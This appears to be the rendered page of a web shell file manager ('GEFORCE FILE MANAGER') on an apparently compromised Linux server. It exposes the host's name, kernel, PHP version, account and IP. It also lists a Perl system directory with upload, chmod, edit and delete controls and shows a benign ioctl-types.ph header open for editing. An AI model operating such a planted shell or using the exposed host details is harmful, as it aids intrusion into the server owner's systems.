[ SYSTEM ]: Linux srv.persadacompanies.com 4.18.0-553.56.1.el8_10.x86_64 #1 SMP Tue Jun 10 05:00:59 EDT 2025 x86_64
[ SERVER ]: Apache | PHP: 8.4.20
[ USER ]: persadamedika | IP: 45.64.1.108
GEFORCE FILE MANAGER
/
usr
/
lib64
/
perl5
/
bits
/
UPLOAD:
NAME
SIZE
QUICK PERMS
ACTIONS
📁 types
SET
[ DEL ]
📄 byteswap.ph
1,641 B
SET
[ EDIT ]
|
[ DEL ]
📄 endian.ph
247 B
SET
[ EDIT ]
|
[ DEL ]
📄 ioctl-types.ph
1,764 B
SET
[ EDIT ]
|
[ DEL ]
📄 ioctls.ph
3,827 B
SET
[ EDIT ]
|
[ DEL ]
📄 long-double.ph
60 B
SET
[ EDIT ]
|
[ DEL ]
📄 pthreadtypes-arch.ph
3,823 B
SET
[ EDIT ]
|
[ DEL ]
📄 pthreadtypes.ph
492 B
SET
[ EDIT ]
|
[ DEL ]
📄 select.ph
1,389 B
SET
[ EDIT ]
|
[ DEL ]
📄 select2.ph
490 B
SET
[ EDIT ]
|
[ DEL ]
📄 sigaction.ph
1,720 B
SET
[ EDIT ]
|
[ DEL ]
📄 sigcontext.ph
889 B
SET
[ EDIT ]
|
[ DEL ]
📄 sigevent-consts.ph
620 B
SET
[ EDIT ]
|
[ DEL ]
📄 siginfo-arch.ph
465 B
SET
[ EDIT ]
|
[ DEL ]
📄 siginfo-consts-arch.ph
207 B
SET
[ EDIT ]
|
[ DEL ]
📄 siginfo-consts.ph
3,615 B
SET
[ EDIT ]
|
[ DEL ]
📄 signum-generic.ph
2,724 B
SET
[ EDIT ]
|
[ DEL ]
📄 signum.ph
1,536 B
SET
[ EDIT ]
|
[ DEL ]
📄 sigstack.ph
441 B
SET
[ EDIT ]
|
[ DEL ]
📄 sigthread.ph
385 B
SET
[ EDIT ]
|
[ DEL ]
📄 sockaddr.ph
507 B
SET
[ EDIT ]
|
[ DEL ]
📄 socket.ph
15,923 B
SET
[ EDIT ]
|
[ DEL ]
📄 socket2.ph
177 B
SET
[ EDIT ]
|
[ DEL ]
📄 socket_type.ph
766 B
SET
[ EDIT ]
|
[ DEL ]
📄 ss_flags.ph
443 B
SET
[ EDIT ]
|
[ DEL ]
📄 stdint-intn.ph
212 B
SET
[ EDIT ]
|
[ DEL ]
📄 syscall.ph
77,580 B
SET
[ EDIT ]
|
[ DEL ]
📄 syslog-ldbl.ph
355 B
SET
[ EDIT ]
|
[ DEL ]
📄 syslog-path.ph
363 B
SET
[ EDIT ]
|
[ DEL ]
📄 syslog.ph
404 B
SET
[ EDIT ]
|
[ DEL ]
📄 thread-shared-types.ph
1,831 B
SET
[ EDIT ]
|
[ DEL ]
📄 types.ph
2,563 B
SET
[ EDIT ]
|
[ DEL ]
📄 typesizes.ph
4,252 B
SET
[ EDIT ]
|
[ DEL ]
📄 uintn-identity.ph
631 B
SET
[ EDIT ]
|
[ DEL ]
📄 waitflags.ph
816 B
SET
[ EDIT ]
|
[ DEL ]
📄 waitstatus.ph
1,573 B
SET
[ EDIT ]
|
[ DEL ]
📄 wordsize.ph
743 B
SET
[ EDIT ]
|
[ DEL ]
DELETE SELECTED
[ CLOSE ]
EDIT: ioctl-types.ph
require '_h2ph_pre.ph'; no warnings qw(redefine misc); unless(defined(&_SYS_IOCTL_H)) { die("Never use <bits/ioctl-types.h> directly; include <sys/ioctl.h> instead."); } require 'asm/ioctls.ph'; eval 'sub NCC () {8;}' unless defined(&NCC); eval 'sub TIOCM_LE () {0x1;}' unless defined(&TIOCM_LE); eval 'sub TIOCM_DTR () {0x2;}' unless defined(&TIOCM_DTR); eval 'sub TIOCM_RTS () {0x4;}' unless defined(&TIOCM_RTS); eval 'sub TIOCM_ST () {0x8;}' unless defined(&TIOCM_ST); eval 'sub TIOCM_SR () {0x10;}' unless defined(&TIOCM_SR); eval 'sub TIOCM_CTS () {0x20;}' unless defined(&TIOCM_CTS); eval 'sub TIOCM_CAR () {0x40;}' unless defined(&TIOCM_CAR); eval 'sub TIOCM_RNG () {0x80;}' unless defined(&TIOCM_RNG); eval 'sub TIOCM_DSR () {0x100;}' unless defined(&TIOCM_DSR); eval 'sub TIOCM_CD () { &TIOCM_CAR;}' unless defined(&TIOCM_CD); eval 'sub TIOCM_RI () { &TIOCM_RNG;}' unless defined(&TIOCM_RI); eval 'sub N_TTY () {0;}' unless defined(&N_TTY); eval 'sub N_SLIP () {1;}' unless defined(&N_SLIP); eval 'sub N_MOUSE () {2;}' unless defined(&N_MOUSE); eval 'sub N_PPP () {3;}' unless defined(&N_PPP); eval 'sub N_STRIP () {4;}' unless defined(&N_STRIP); eval 'sub N_AX25 () {5;}' unless defined(&N_AX25); eval 'sub N_X25 () {6;}' unless defined(&N_X25); eval 'sub N_6PACK () {7;}' unless defined(&N_6PACK); eval 'sub N_MASC () {8;}' unless defined(&N_MASC); eval 'sub N_R3964 () {9;}' unless defined(&N_R3964); eval 'sub N_PROFIBUS_FDL () {10;}' unless defined(&N_PROFIBUS_FDL); eval 'sub N_IRDA () {11;}' unless defined(&N_IRDA); eval 'sub N_SMSBLOCK () {12;}' unless defined(&N_SMSBLOCK); eval 'sub N_HDLC () {13;}' unless defined(&N_HDLC); eval 'sub N_SYNC_PPP () {14;}' unless defined(&N_SYNC_PPP); eval 'sub N_HCI () {15;}' unless defined(&N_HCI); 1;